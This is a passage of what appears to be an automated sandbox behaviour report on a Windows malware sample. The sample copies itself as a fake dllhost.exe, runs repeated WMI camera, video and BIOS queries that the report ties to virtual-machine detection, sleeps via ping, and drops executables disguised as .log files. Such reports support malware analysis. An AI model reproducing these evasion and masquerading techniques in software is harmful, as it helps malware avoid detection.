Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\dllhost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Memory allocated: 2950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Memory allocated: 1AB20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Memory allocated: F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Memory allocated: 1ADB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594343	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 593796	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 593515	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 593203	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 592765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591937	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591593	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591296	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591071	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 590765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 590390	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 590078	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 589593	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 589234	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588996	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588375	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588093	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587894	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587656	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587535	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587406	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587296	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587181	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587062	Jump to behavior

Source: C:\Users\Public\Libraries\dllhost.exe	Window / User API: threadDelayed 5734			Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Window / User API: threadDelayed 3952			Jump to behavior

Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PTahnXzX.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RGKyyyvv.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uOjtiFsK.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AHMSLlxy.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gsyeVgYo.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FCNjSRns.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iObdSlbK.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sVUKwIHM.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jzvnrySk.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ypXSetlg.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GzproQCn.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sOBLQjau.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PVfhrllC.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VVaGAqXJ.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kfPdycnc.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wnljJKgl.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TYzyfqIO.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tCFTCxVs.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hiGnLHFR.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YwOfwePf.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ygASuHSj.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZRcXHVNC.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DOJbgDru.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IYriOWqO.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WJeOmDSH.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QiIHXtHV.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bYXvUFHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hZjnbUmV.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FdoRXWMY.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UJxgUhAr.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FnLRHIfV.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KpfivNCg.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XxiWXROF.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eEtWkScq.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HpyAdrkQ.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tRHlMFdP.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lQNLnUfF.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\onNmUvhY.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QALqtMNE.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\haXUgXfM.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vEsBXgan.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MRnySouc.log	Jump to dropped file

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe TID: 2676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 6284	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4948	Thread sleep time: -14400000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -594921s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -594343s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -594093s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -593796s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -593515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -593203s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -592765s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -591937s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -591593s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -591296s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -591071s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -590765s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -590390s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -590078s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -589593s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -589234s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -588996s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -588765s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -588375s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -588093s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587894s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587765s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4948	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587656s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587535s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587406s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587296s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587181s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe TID: 4280	Thread sleep time: -587062s >= -30000s	Jump to behavior

Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\Public\Libraries\dllhost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

